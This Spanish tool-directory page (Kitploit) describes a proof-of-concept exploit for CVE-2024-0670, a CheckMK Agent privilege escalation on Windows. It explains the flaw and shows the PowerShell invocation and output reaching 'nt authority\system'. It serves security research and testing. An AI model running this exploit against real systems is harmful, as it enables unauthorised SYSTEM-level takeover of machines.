Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/magicrc/cve-2024-0670
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHubmagicrc/cve-2024-0670

CVE-2024-0670

PoC para CVE-2024-0670

Ver Repositorio
11hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

CVE-2024-0670 PoC

Este repositorio proporciona un exploit Proof of Concept (PoC) para la vulnerabilidad CVE-2024-0670, que afecta al CheckMK Agent en sistemas Windows. La vulnerabilidad ocurre cuando el CheckMK Agent crea y ejecuta archivos temporales en el directorio C:\Windows\Temp. Un atacante puede abusar de este comportamiento colocando previamente archivos maliciosos en ese directorio con protección contra escritura. Cuando el agente intenta crear un archivo temporal que ya existe como solo lectura, falla al sobrescribirlo pero sigue ejecutando el archivo existente con privilegios SYSTEM, lo que permite la escalada de privilegios.

Referencia del aviso: SEC Consult - Escalada de privilegios local mediante archivos escribibles en Checkmk Agent


⚠️ DESCARGO DE RESPONSABILIDAD

Este proyecto está destinado únicamente con fines educativos, de investigación y pruebas de seguridad autorizadas.
No utilice este código en sistemas que no posea o para los que no tenga permiso explícito de pruebas.
El autor no es responsable de ningún daño o mal uso.


Uso

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"

Ejemplo

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer... 
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
Descargar herramienta